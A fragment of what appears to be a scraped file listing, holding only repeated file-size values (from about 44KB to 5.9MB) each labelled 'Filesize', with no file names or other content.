540KB
-
Filesize
1.1MB
-
Filesize
72KB
-
Filesize
84KB
-
Filesize
736KB
-
Filesize
3.5MB
-
Filesize
184KB
-
Filesize
752KB
-
Filesize
184KB
-
Filesize
52KB
-
Filesize
100KB
-
Filesize
212KB
-
Filesize
100KB
-
Filesize
60KB
-
Filesize
144KB
-
Filesize
5.9MB
-
Filesize
52KB
-
Filesize
172KB
-
Filesize
48KB
-
Filesize
44KB
-
Filesize
48KB
-
Filesize
48KB
-
Filesize
56KB
-
Filesize
48KB
-
Filesize
44KB
-
Filesize
44KB
-
Filesize
72KB
-
Filesize
84KB
-
Filesize
1.1MB
-
Filesize
736KB
-
Filesize
184KB
-
Filesize
3.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
52KB
-
Filesize
184KB
-
Filesize
172KB
-
Filesize
52KB
-
Filesize
752KB
-
Filesize
180KB
-
Filesize
144KB
-
Filesize
60KB
-
Filesize
5.9MB